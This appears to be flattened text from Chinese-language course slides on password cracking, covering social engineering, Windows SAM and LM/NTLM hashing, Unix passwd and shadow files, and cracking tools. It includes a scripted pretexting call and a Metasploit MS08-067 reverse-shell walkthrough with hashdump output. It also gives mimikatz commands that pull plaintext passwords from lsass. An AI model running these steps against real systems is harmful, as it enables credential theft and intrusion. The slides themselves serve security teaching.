1目錄（Contents）常用口令破解技術(shù)操作系統(tǒng)口令文件與破解數(shù)據(jù)庫(kù)口令文件與破解口令破解防御技術(shù)

2常用口令破解技術(shù)社會(huì)工程學(xué)(SocialEngineering)：讓人們順從你的意愿、滿(mǎn)足你的欲望的一門(mén)藝術(shù)與學(xué)問(wèn)，是一種利用人性的弱點(diǎn)、結(jié)合心理學(xué)知識(shí)，通過(guò)對(duì)人性的理解和人的心理的了解來(lái)獲得目標(biāo)系統(tǒng)敏感信息的技術(shù)。對(duì)人的“滲透”如果攻擊者能通過(guò)一些方式得到系統(tǒng)可用的賬號(hào)和口令，或使公司內(nèi)部的某個(gè)人確信他是被信任的實(shí)體，他就很可能獲得系統(tǒng)的訪(fǎng)問(wèn)權(quán)限3社會(huì)工程學(xué)(SocialEngineering)攻擊者：喂，我是大為。我在技術(shù)支持中心工作，現(xiàn)在我要對(duì)你的系統(tǒng)進(jìn)行例行維護(hù)。受騙者：是嗎？我從來(lái)沒(méi)有聽(tīng)說(shuō)支持中心要對(duì)我們的系統(tǒng)進(jìn)行例行維護(hù)。攻擊者：嗯，是這樣，上個(gè)季度我們才開(kāi)始做這個(gè)工作。我們正在為所有遠(yuǎn)程用戶(hù)做例行維護(hù)。我剛剛做完北區(qū)的所有計(jì)算機(jī)的維護(hù)。實(shí)際上，絕大多數(shù)用戶(hù)都說(shuō)，經(jīng)過(guò)這次維護(hù)之后，他們的計(jì)算機(jī)的速度明顯加快了。受騙者：是嗎？那好，如果其它人的機(jī)器速度都加快了，那么我也這樣做一下?，F(xiàn)在我需要做些什么？攻擊者：嗯，你不需要做什么。我可以遠(yuǎn)程地把一切都為你做好，但為了能夠這樣做，我需要知道你的VPN用戶(hù)名和口令。受騙者：你真的能夠遠(yuǎn)程地做好這一切？真是太好了。嗯，我的用戶(hù)名是abc，口令是shazi。攻擊者：太好了。謝謝你的協(xié)助。我將以VPN方式登錄到你的計(jì)算機(jī)，并進(jìn)行例行維護(hù)。這只需要幾分鐘的時(shí)間。4社會(huì)工程學(xué)(SocialEngineering)至此，我們得到了用戶(hù)名和密碼5SocialEngineeringToolkit(SET)魚(yú)叉式釣魚(yú)攻擊網(wǎng)站攻擊介質(zhì)感染攻擊創(chuàng)建一個(gè)有效載荷和偵聽(tīng)器群發(fā)郵件攻擊基于A(yíng)rduino的攻擊短信欺騙攻擊無(wú)線(xiàn)接入點(diǎn)攻擊二維碼攻擊powershell攻擊windows:安全賬戶(hù)管理器SAM（SecurityAccountManager）機(jī)制%systemroot%system32\config目錄下6操作系統(tǒng)的口令文件—windowsSAM文件：含有本地系統(tǒng)或所在控制域上所有用戶(hù)名和口令的Hash值創(chuàng)建口令Hash有兩種方法:LANManager(LM)—最早使用的密碼哈希算法之一NTLANManagerv2(NTLMv2)—Windows2000、XP、Vista和7等remark：新OS支持使用LM哈希，主要是提供后向兼容性，在WindowsVista/7/8/10/…中默認(rèn)被禁用安全標(biāo)識(shí)RID：在賬號(hào)創(chuàng)建時(shí)被創(chuàng)建；賬號(hào)刪除，RID也同時(shí)刪除；即使用戶(hù)名相同，每次創(chuàng)建時(shí)獲得的RID也不同7操作系統(tǒng)的口令文件—windowsWindows系統(tǒng)下的hash密碼格式為：用戶(hù)名:RID:LM-HASH值:NT-HASH值例：Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::用戶(hù)名

：Administrator

RID：500

LM-HASH值：C8825DB10F2590EAAAD3B435B51404EE

NT-HASH值

：683020925C5D8569C23AA724774CE6CC8操作系統(tǒng)的口令文件—windows密碼的LM哈希步驟（假設(shè)口令為”Welcome”）：將用戶(hù)的口令全部轉(zhuǎn)換為大寫(xiě)字母添加空（null）字符，直到口令長(zhǎng)度等于14個(gè)字符；并轉(zhuǎn)化為二進(jìn)制字符串將新獲得的口令拆分為兩組7位的字符串分別經(jīng)str_to_key()函數(shù)處理創(chuàng)建兩個(gè)DES加密密鑰，并為每一組添加奇偶校驗(yàn)位，即可創(chuàng)建出64位的密鑰使用每個(gè)DES密鑰加密一個(gè)預(yù)定義的魔術(shù)字符串（KGS!@#$%），獲得兩個(gè)8字節(jié)密文值密文值鏈接組成16字節(jié)的值，即最終獲得的LM哈希9操作系統(tǒng)的口令文件—windowsWelcomeWELCOME57454C434F4D450000000000000056A25288347A348A00000000000000str_to_key()C23413A8A1E7665F&AAD3B435B51404EELM哈希C23413A8A1E7665FAAD3B435B51404EEDES加密

10操作系統(tǒng)的口令文件—windowsNTLMv2哈希：從WindowsNT4開(kāi)始被用作全新的身份驗(yàn)證方法11操作系統(tǒng)的口令文件—windows安全性：MD4比DES更加健壯，因?yàn)榭梢越邮芨L(zhǎng)的密碼可允許同時(shí)使用大寫(xiě)和小寫(xiě)的字母不需要將密碼拆分為更小、更易于破解的片段12345631003200330034003500360032ED87BDB5FDC5E9CBA88547376818D4unicodeMD4Little-endian序登錄Windows系統(tǒng)主要包括兩種方式，其對(duì)應(yīng)的身份認(rèn)證方式也不相同交互式登錄：向本地計(jì)算機(jī)或域（domain）賬戶(hù)確認(rèn)用戶(hù)的身份本地賬戶(hù)登錄本地計(jì)算機(jī)：可以使用存儲(chǔ)在本地SAM中的口令散列進(jìn)行登錄——用戶(hù)輸入明文口令，系統(tǒng)對(duì)口令使用相同的加密散列過(guò)程，并將散列結(jié)果與保存的散列進(jìn)行比較，如果匹配，則通過(guò)驗(yàn)證域賬戶(hù)登錄：默認(rèn)使用KerberosV5（身份認(rèn)證章節(jié)）網(wǎng)絡(luò)登錄：對(duì)用戶(hù)嘗試訪(fǎng)問(wèn)的網(wǎng)絡(luò)服務(wù)或資源提供用戶(hù)驗(yàn)證。可使用多種網(wǎng)絡(luò)身份驗(yàn)證機(jī)制，如KerberosV5、安全套接字/傳輸層安全（SSL/TLS）以及與WindowsNT4.0兼容的NTLM機(jī)制12Windows系統(tǒng)的登錄與身份認(rèn)證基于挑戰(zhàn)/響應(yīng)機(jī)制（C/R，Challenge/Response）13NTLM的身份認(rèn)證機(jī)制在登錄前，客戶(hù)端會(huì)緩存輸入口令的Hash值，明文口令被丟棄14LM、NTLMv1、NTLMv2的比較LMNTLMv1NTLMv2PasswordcasesensitiveNoYesYesHashkeylength56bit+56bit--PasswordhashalgorithmDES(ECBmode)MD4MD4Hashvaluelength64bit+64bit128bit128bitC/Rkeylength56bit+56bit+16bit56bit+56bit+16bit128bitC/RalgorithmDES(ECBmode)DES(ECBmode)HMAC_MD5C/Rvaluelength64bit+64bit+64bit64bit+64bit+64bit128bitNTLMv1，v2：都是基于挑戰(zhàn)/響應(yīng)的認(rèn)證獲取SAM文件：獲取備份SAM：早期Windows版本會(huì)在%systemroot%\repair目錄中備份一個(gè)SAM文件，多數(shù)管理員都會(huì)忘記刪這些文件滲透獲取shell后獲取SAM：通過(guò)使用MS08_067漏洞利用工具獲得存在計(jì)算機(jī)的反彈Shell，然后再將"GetHashes"軟件上傳到系統(tǒng)中來(lái)執(zhí)行"GetHashes$Local"命令15windows口令破解獲取SAM文件（實(shí)戰(zhàn)）——基于MSF一臺(tái)存在ms08_067漏洞的xp主機(jī)msf>useexploit/windows/smb/ms08_067_netapimsfexploit(ms08_067_netapi)>setrhost28msfexploit(ms08_067_netapi)>settarget34msfexploit(ms08_067_netapi)>setpayloadwindows/meterpreter/reverse_tcpmsfexploit(ms08_067_netapi)>setlhost31msfexploit(ms08_067_netapi)>exploit

meterpreter>usepriv16windows口令破解meterpreter>runpost/windows/gather/hashdump[*]Obtainingthebootkey...[*]CalculatingthehbootkeyusingSYSKEYfebed0756527c7abeebb11bd723fe184...[*]Obtainingtheuserlistandkeys...[*]Decryptinguserkeys...[*]Dumpingpasswordhashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::ben:1003:27e11ebaa15f64c7aad3b435b51404ee:1bbdfacfb58b9c8aab9d68ed52d6e91f:::17windows口令破解俄羅斯人出品的Windows密碼恢復(fù)軟件，支持WindowsNT/2000/XP/Vista/7操作系統(tǒng)可進(jìn)行字典破解，暴力破解，掩碼破解和彩虹表破解導(dǎo)出PWDUMP格式密碼文件：File-->ExportusersinPWDUMPfile18破解工具--SAMInside法國(guó)人GentilKiwi編寫(xiě)的一款windows平臺(tái)下的神器，具備很多功能，其最亮眼的功能是直接從

lsass.exe

進(jìn)程里獲取windows處于active狀態(tài)賬號(hào)的明文密碼lsass.exe（LocalSecurityAuthorityService）：系統(tǒng)進(jìn)程，用于Windows系統(tǒng)的安全機(jī)制——本地安全和登錄策略mimikatz還可以提升進(jìn)程權(quán)限，注入進(jìn)程，讀取進(jìn)程內(nèi)存等mimikatz包含很多本地模塊，更像是一個(gè)輕量級(jí)的調(diào)試器19破解工具--

mimikatz以管理員身份運(yùn)行mimikatz提升至debug權(quán)限：privilege::debug抓取密碼：sekurlsa::logonpasswords20破解工具--

mimikatz基于彩虹表的windows密碼破解軟件21破解工具--Ophcrack時(shí)間-空間的折中https://ophcrack.sourceforge.io/其他：L0phtCrack（LC5/6/7,）：JohntheRipper(/john/)Cain&Abel（可破解MySQL，MSSQL等數(shù)據(jù)庫(kù)密碼,www.oxid.it,更新至2014）

22口令破解工具獲取本地用戶(hù)賬號(hào)和密碼工具：fgdump(pwdump)密碼修改：passwd普通用戶(hù)：管理員（root）：可以更改任何人的密碼，而且不需要知道其他用戶(hù)的密碼23Unix/Linux密碼Unix密碼系統(tǒng)：/etc/passwd:包含了用戶(hù)名、用戶(hù)的真實(shí)姓名、標(biāo)識(shí)信息以及每個(gè)用戶(hù)的基本信息，各個(gè)域之間用”:”隔開(kāi)24Unix/Linux密碼用戶(hù)的主目錄用戶(hù)名加密密碼位置，一般放在單獨(dú)的影子(shadow)密碼文件中UID+GID用戶(hù)的全名用戶(hù)的shell過(guò)去：Unix通過(guò)一個(gè)單向函數(shù)crypt()對(duì)密碼進(jìn)行加密并保存該加密值crypt()基于DES算法crypt()使用用戶(hù)口令作為DES加密密鑰（用戶(hù)口令的前8個(gè)字符，每個(gè)字符各取最低7個(gè)比特，共56比特），加密一個(gè)全零的64位塊；然后再對(duì)結(jié)果密文加密，共加密25次。最后的64位密文被劃分為11個(gè)可打印字符，并保存起來(lái)每個(gè)字符表示6位，然后可順序表示成[a–zA–Z0–9./]等64個(gè)字符25Unix加密密碼系統(tǒng)（從過(guò)去到現(xiàn)在）現(xiàn)在：UnixSalt：Morris和Thompson對(duì)DES算法進(jìn)行了修改：增加了salt位（2個(gè)字符的字符串：

[a–zA–Z0–9./]，每個(gè)字符表示6位，共4096種可能）當(dāng)用戶(hù)改變口令時(shí)，系統(tǒng)根據(jù)日期選擇一個(gè)salt值，然后將該salt值轉(zhuǎn)化為2個(gè)字符的字符串，并連同加密后的口令一起保存起來(lái)相同的口令+不同的salt值=不同的加密后的口令crypt16():為提高crypt()函數(shù)的安全性，Unix系統(tǒng)改變了crypt()函數(shù)函數(shù)的加密算法，使用如Blowfish、MD5等算法26Unix加密密碼系統(tǒng)（從過(guò)去到現(xiàn)在）MCF（模塊化加密格式）：27Unix加密密碼系統(tǒng)（從過(guò)去到現(xiàn)在）域用途備注#1指定使用的加密算法#2salt限定為16個(gè)字符#3加密后的密碼不包含saltSalt：最多可以為16個(gè)字符Key：整個(gè)用戶(hù)口令都有意義/etc/shadow:影子密碼文件，包含了加密過(guò)的密碼以及密碼失效時(shí)間/etc/shadow文件被保護(hù)起來(lái)，只有root用戶(hù)才能讀取28/etc/shadow用戶(hù)名：密碼：上次修改口令時(shí)間：兩次修改口令間隔最少的天數(shù)：兩次修改口令間隔最多的天數(shù)：提前多少天警告用戶(hù)口令將過(guò)期：在口令過(guò)期之后多少天禁用此用戶(hù)：用戶(hù)過(guò)期日期（距1970年01月01日的天數(shù)）：保留字段（目前為空備將來(lái)Linux發(fā)展之用）用戶(hù)標(biāo)識(shí)符UID：1~499：用于系統(tǒng)功能500~：用戶(hù)//有的系統(tǒng)已經(jīng)改為10000：超級(jí)用戶(hù)保留（當(dāng)UID為0的用戶(hù)運(yùn)行一個(gè)進(jìn)程時(shí)，內(nèi)核對(duì)該進(jìn)程取消了大部分的安全檢查）Remark：Unix的特權(quán)是根據(jù)UID來(lái)確定的，與Unix賬號(hào)無(wú)關(guān)賬號(hào)為root，UID為500的用戶(hù)沒(méi)有特權(quán)29UID,GIDid命令：提供更詳細(xì)的UID，GID等信息組標(biāo)識(shí)符GID：每個(gè)Unix用戶(hù)都屬于一個(gè)或者幾個(gè)組每個(gè)用戶(hù)都隸屬于一個(gè)主用戶(hù)組，存儲(chǔ)在/etc/passwd文件中可以利用組來(lái)限制一些用戶(hù)對(duì)敏感信息或者特殊許可的應(yīng)用程序的訪(fǎng)問(wèn)權(quán)/etc/group：列出了計(jì)算機(jī)上所有的組/etc/gshadow：計(jì)算機(jī)上所有組的群組影子密碼文件30UID,GID31UID,GID/etc/group/etc/gshadow組名：組密碼：GID：組成員可用groups命令查看用戶(hù)當(dāng)前屬于那些組su：用戶(hù)切換

usage：su[用戶(hù)名]如果省略用戶(hù)名，則切換到超級(jí)用戶(hù)su與su–su:不會(huì)更換當(dāng)期目錄等信息su-:默認(rèn)切換到root用戶(hù)主目錄su-c“/etc/rc.d/init.d/httpdstart”:

用戶(hù)成為root用戶(hù)只發(fā)布一條命令，一旦命令被執(zhí)行，root權(quán)限立即終止remark：Xshell，Putty，SSHSecureShell，SecureCRT等軟件遠(yuǎn)程登錄系統(tǒng)32suJohntheRipperJohnny(John的圖形化界面版本)33Linux